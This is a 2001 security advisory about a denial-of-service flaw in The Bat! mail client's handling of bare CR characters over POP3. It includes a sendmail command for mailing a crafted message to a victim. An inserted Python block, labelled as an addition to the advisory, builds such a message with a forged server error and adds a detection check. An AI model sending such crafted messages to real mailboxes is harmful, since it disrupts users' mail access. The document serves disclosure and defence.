  Problem in The Bat! (<CR> handling)

From:3APA3A <3APA3A_(at)_security.nnov.ru>
Date:18.04.2001
Subject:SECURITY.NNOV: The Bat! <cr> bug

SECURITY.NNOV URL:      http://www.security.nnov.ru
Topic:                  The Bat! <cr> bug
Application:            The Bat! 1.51 (latest)
Vendor:                 RitLabs
Category:               Denial of Service
Risk Factor:            Low
Remote:                 Yes
Vendor Contacted:       13.04.2001
Software URL:           http://www.thebat.net
Vendor URL:             http://www.ritlabs.com

+Introduction:

The Bat! is a very convenient, commercially available MUA for Windows
with a lot of features.

+Details:

While RETRieving a message via POP3 (IMAP was not tested), The Bat!
incorrectly processes a 0x0D (CR) character that is not followed by
0x0A (LF). Probably each bare 0x0D is counted as two octets, so The
Bat! miscalculates the size of the message and treats the trailing part
of the message as a reply from the POP3 server. As a result The Bat!
fails to receive the rest of the messages and fails to delete the
already received messages from the server, which amounts to a DoS
against the user's POP3 account. Because message text is parsed as
server output, a malformed message can emulate any POP3 server reply.

+Exploitation:

Extract the attached "badmessage" and send it, e.g. using

  cat badmessage | sendmail -U victim@somewhere.net

or copy it into the user's mailbox.
This message causes The Bat! to show something like:

  !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--
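The mechanism guessed in the Details section and the forged "-ERR" line shown above, modelled in Python as an added example (not part of the advisory and not The Bat!'s code): a server answers RETR as RFC 1939 prescribes, with an octet count, dot-stuffed lines and a lone "." terminator; a hypothetical size-driven reader that bills a bare CR as two octets stops early and then reads the forged "-ERR Wrong User" line out of the message as the server's reply, while a terminator-driven reader recovers the whole message and the server's real next reply. The message layout, the `read_by_octet_count` model and the server replies are constructed assumptions; the same layout works for any forged reply, not only "-ERR".

```python
"""Model of the bare-CR / RETR confusion described in the advisory.

A POP3 server answers RETR with "+OK <n> octets", the message with CRLF
line endings and leading dots stuffed, then a lone "." line (RFC 1939,
section 3). A client that trusts the octet count and miscounts a bare
CR stops early and then parses attacker-controlled message text as the
server's next reply. All data here is constructed for this example; the
size-driven reader is an assumed model, not The Bat!'s actual code.
"""
import re

CRLF = b"\r\n"
BARE_CR = re.compile(rb"\r(?!\n)")
# Constructed forged reply, the line the advisory shows The Bat! printing.
FORGED = b"-ERR Wrong User: replace user with your system administrator" + CRLF


def has_bare_cr(data: bytes) -> bool:
    """Detection check: is there a CR that is not followed by LF?"""
    return BARE_CR.search(data) is not None


def build_retr_response(body: bytes) -> bytes:
    """Server side of RETR: status with octet count, dot-stuffed body,
    terminating "." line."""
    if not body.endswith(CRLF):
        body += CRLF
    stuffed = CRLF.join(b"." + l if l.startswith(b".") else l
                        for l in body.split(CRLF))
    return b"+OK %d octets" % len(body) + CRLF + stuffed + b"." + CRLF


def read_by_octet_count(stream: bytes):
    """Assumed model of the flawed client: trust the advertised octet
    count and bill each bare CR as two octets. Returns (message, unread)."""
    status, _, rest = stream.partition(CRLF)
    size = int(re.match(rb"\+OK (\d+) octets", status).group(1))
    pos = counted = 0
    while counted < size and pos < len(rest):
        bare = rest[pos] == 0x0D and rest[pos:pos + 2] != CRLF
        counted += 2 if bare else 1
        pos += 1
    message, unread = rest[:pos], rest[pos:]
    # A terminator right here is consumed; after a miscount the client
    # never sees it and the message tail becomes "server output".
    if unread.startswith(b"." + CRLF):
        unread = unread[3:]
    return message, unread


def read_by_terminator(stream: bytes):
    """RFC 1939 reader: ignore the octet count, read CRLF lines until the
    lone "." line and un-stuff leading dots. Bare CRs stay inside a line
    and a lying octet count is irrelevant. Returns (message, unread)."""
    status, sep, rest = stream.partition(CRLF)
    if not sep or not status.startswith(b"+OK"):
        raise ValueError("bad RETR status: %r" % status)
    lines = []
    while True:
        line, sep, rest = rest.partition(CRLF)
        if not sep:
            raise ValueError("truncated multi-line response")
        if line == b".":
            break
        lines.append(line[1:] if line.startswith(b".") else line)
    return b"".join(l + CRLF for l in lines), rest


def crafted_message() -> bytes:
    """Constructed malicious message: one bare CR per byte of the forged
    tail, so the size-driven reader stops exactly at the forged line."""
    return b"Subject: test" + CRLF + CRLF + b"\r" * len(FORGED) + CRLF + FORGED


def next_reply(unread: bytes) -> bytes:
    """What the client parses as the server's answer to its next command."""
    return unread.partition(CRLF)[0]


def demo():
    body = crafted_message()
    # Constructed genuine server reply to the client's following DELE.
    stream = build_retr_response(body) + b"+OK message 1 deleted" + CRLF
    flawed_msg, flawed_rest = read_by_octet_count(stream)
    good_msg, good_rest = read_by_terminator(stream)
    return {
        "bare_cr": has_bare_cr(body),
        "flawed_next_reply": next_reply(flawed_rest),
        "flawed_message_truncated": flawed_msg != body,
        "correct_message_ok": good_msg == body,
        "correct_next_reply": next_reply(good_rest),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The size-driven reader is only a plausible reconstruction of the advisory's "probably"; the point that holds regardless of the client's internals is that a multi-line POP3 response must be delimited by the CRLF.CRLF terminator, never by an advertised byte count, and that `has_bare_cr` is a cheap way to flag messages built this way before they reach a fragile client.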


+Workaround:

Use the "Dispatch Mail on Server" feature to delete the malformed
message from the server, or use a different MUA.


+Solution:

None yet.

+Vendor:

RitLabs was contacted on April 13 (happy Easter to you, guys). No
feedback yet.

This  advisory  is being provided to you under RFPolicy v.2 documented
at http://www.wiretrip.net/rfp/policy.html.


--
http://www.security.nnov.ru
        /\_/\
       { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                   |/
You know my name - look up my number (The Beatles)
